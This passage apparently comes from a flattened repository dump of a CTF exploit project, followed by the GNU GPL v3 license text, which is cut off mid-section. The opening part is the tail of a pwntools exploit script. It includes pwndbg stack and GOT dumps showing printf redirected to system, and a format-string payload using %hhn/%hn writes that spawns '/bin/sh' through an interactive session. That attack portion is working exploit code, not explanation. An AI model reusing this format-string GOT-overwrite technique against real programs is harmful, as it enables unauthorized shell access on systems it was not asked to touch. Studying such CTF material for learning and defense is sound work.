0xffa077e4 ◂— 0x0 153 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 154 | 0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 155 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 156 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 157 | 0e:0038│ 0xffa077f8 ◂— 0x0 158 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 159 | 10:0040│ 0xffa07800 ◂— 0x1 160 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 161 | 12:0048│ 0xffa07808 ◂— 0x0 162 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 163 | 14:0050│ 0xffa07810 ◂— 0x1 164 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d46930 165 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 166 | 17:005c│ 0xffa0781c ◂— 0x0 167 | ... ↓ 168 | pwndbg> n 169 | 0x08048540 in do_fmt () 170 | LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 171 | ────────────────────────[ REGISTERS ]──────────────────────── 172 | EAX 0x7b38 173 | EBX 0x0 174 | ECX 0xffa052a0 ◂— 0x20202020 (' ') 175 | EDX 0xf7eb1870 (_IO_stdfile_1_lock) ◂— 0x0 176 | EDI 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 177 | ESI 0x1 178 | EBP 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 179 | ESP 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 180 | EIP 0x8048540 (do_fmt+69) ◂— add esp, 0x10 181 | ─────────────────────────[ DISASM ]────────────────────────── 182 | 0x804853b call printf@plt <0x80483a0> 183 | 184 | ► 0x8048540 add esp, 0x10 185 | 0x8048543 jmp do_fmt+6 <0x8048501> 186 | ↓ 187 | 0x8048501 sub esp, 4 188 | 0x8048504 push 0xc8 189 | 0x8048509 push buf <0x804a060> 190 | 0x804850e push 0 191 | 0x8048510 call read@plt <0x8048390> 192 | 193 | 0x8048515 add esp, 0x10 194 | 0x8048518 sub esp, 4 195 | 0x804851b push 4 196 | ──────────────────────────[ STACK ]────────────────────────── 197 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 198 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 199 | 02:0008│ 0xffa077c8 ◂— 0x4 200 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 201 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 202 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 203 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 204 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc 205 | ────────────────────────[ BACKTRACE ]──────────────────────── 206 | ► f 0 8048540 do_fmt+69 207 | f 1 804a010 _GLOBAL_OFFSET_TABLE_+16 208 | f 2 f7eb0d60 _IO_2_1_stdout_ 209 | f 3 804a012 _GLOBAL_OFFSET_TABLE_+18 210 | f 4 f7eb03dc __exit_funcs 211 | f 5 ffa07810 212 | f 6 f7d15276 __libc_start_main+246 213 | pwndbg> stack 25 214 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 215 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 216 | 02:0008│ 0xffa077c8 ◂— 0x4 217 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 218 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 219 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 220 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 221 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc 222 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 223 | 09:0024│ 0xffa077e4 ◂— 0x0 224 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 225 | 0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 226 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 227 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 228 | 0e:0038│ 0xffa077f8 ◂— 0x0 229 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 230 | 10:0040│ 0xffa07800 ◂— 0x1 231 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 232 | 12:0048│ 0xffa07808 ◂— 0x0 233 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 234 | 14:0050│ 0xffa07810 ◂— 0x1 235 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d37b30 236 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 237 | 17:005c│ 0xffa0781c ◂— 0x0 238 | ... ↓ 239 | pwndbg> got 240 | 241 | GOT protection: Partial RELRO | GOT functions: 6 242 | 243 | [0x804a00c] read@GLIBC_2.0 -> 0xf7dd3c50 (read) ◂— cmp dword ptr gs:[0xc], 0 244 | [0x804a010] printf@GLIBC_2.0 -> 0xf7d37b30 (system) ◂— sub esp, 0xc 245 | [0x804a014] puts@GLIBC_2.0 -> 0xf7d5c870 (puts) ◂— push ebp 246 | [0x804a018] __libc_start_main@GLIBC_2.0 -> 0xf7d15180 (__libc_start_main) ◂— push ebp 247 | [0x804a01c] setvbuf@GLIBC_2.0 -> 0xf7d5cff0 (setvbuf) ◂— push ebp 248 | [0x804a020] strncmp@GLIBC_2.0 -> 0xf7e3a5d0 (__strncmp_sse4_2) ◂— push ebp 249 | ''' 250 | # gdb.attach(io, "b *do_fmt+64\nc") 251 | payload = "%{}c%{}$hhn".format(libc.sym['system'] >> 16 & 0xff, 0xb) 252 | payload += "%{}c%{}$hn".format((libc.sym['system'] & 0xffff) - (libc.sym['system'] >> 16 & 0xff), 0x7) 253 | payload += '44444444\0' 254 | info(payload) 255 | io.sendafter("33333333", payload) 256 | pause() 257 | 258 | io.sendafter("44444444", "/bin/sh\0") 259 | 260 | io.interactive() 261 | io.close() 262 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 